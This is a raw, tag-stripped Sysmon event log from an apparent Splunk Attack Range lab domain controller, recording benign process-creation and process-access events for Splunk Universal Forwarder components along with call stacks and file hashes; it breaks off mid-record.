16:05:09.544{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-54B5-6008-D006-00000000A301}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030192Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:09.544{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54B5-6008-D006-00000000A301}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030191Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:09.545{7901BC46-54B5-6008-D006-00000000A301}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030208Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.201{7901BC46-54B6-6008-D106-00000000A301}77804212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030207Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.044{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54B6-6008-D106-00000000A301}7780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030206Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.044{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030205Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.044{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030204Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.044{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030203Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.044{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030202Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.044{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-54B6-6008-D106-00000000A301}7780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030201Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.044{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54B6-6008-D106-00000000A301}7780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030200Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.046{7901BC46-54B6-6008-D106-00000000A301}7780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030225Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:11.669{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54B7-6008-D306-00000000A301}2156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030224Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:11.669{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030223Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:11.669{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030222Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:11.669{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030221Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:11.669{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030220Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:11.669{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-54B7-6008-D306-00000000A301}2156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030219Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:11.669{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54B7-6008-D306-00000000A301}2156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030218Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:11.670{7901BC46-54B7-6008-D306-00000000A301}2156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030217Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:11.154{7901BC46-54B6-6008-D206-00000000A301}55407604C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030216Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.998{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54B6-6008-D206-00000000A301}5540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030215Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.998{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030214Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.998{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030213Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.998{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030212Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.998{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030211Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.998{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-54B6-6008-D206-00000000A301}5540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030210Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.998{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54B6-6008-D206-00000000A301}5540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030209Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:10.998{7901BC46-54B6-6008-D206-00000000A301}5540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030252Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 